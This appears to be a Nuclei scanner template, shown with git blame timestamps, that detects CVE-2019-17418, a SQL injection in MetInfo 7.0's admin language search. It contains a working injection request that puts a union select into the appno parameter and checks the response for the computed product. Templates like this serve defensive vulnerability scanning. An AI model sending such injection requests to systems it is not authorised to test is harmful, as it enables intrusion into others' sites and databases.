2022-04-15 05:55:48 +00:00
id : CVE-2019-17418
info :
name : Metinfo SQLI
author : ritikchaddha
severity : high
2022-04-15 10:46:55 +00:00
description : An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997
2022-04-15 05:55:48 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2019-17418
2022-04-15 10:46:55 +00:00
tags : metinfo,sqli,cve,cve2019
2022-04-15 05:55:48 +00:00
requests :
- method : GET
path :
2022-04-15 10:46:55 +00:00
- "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"
2022-04-15 05:55:48 +00:00
redirects : true
max-redirects : 2
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-04-15 10:46:55 +00:00
- "43865094559"
2022-04-15 05:55:48 +00:00
- type : status
status :
- 200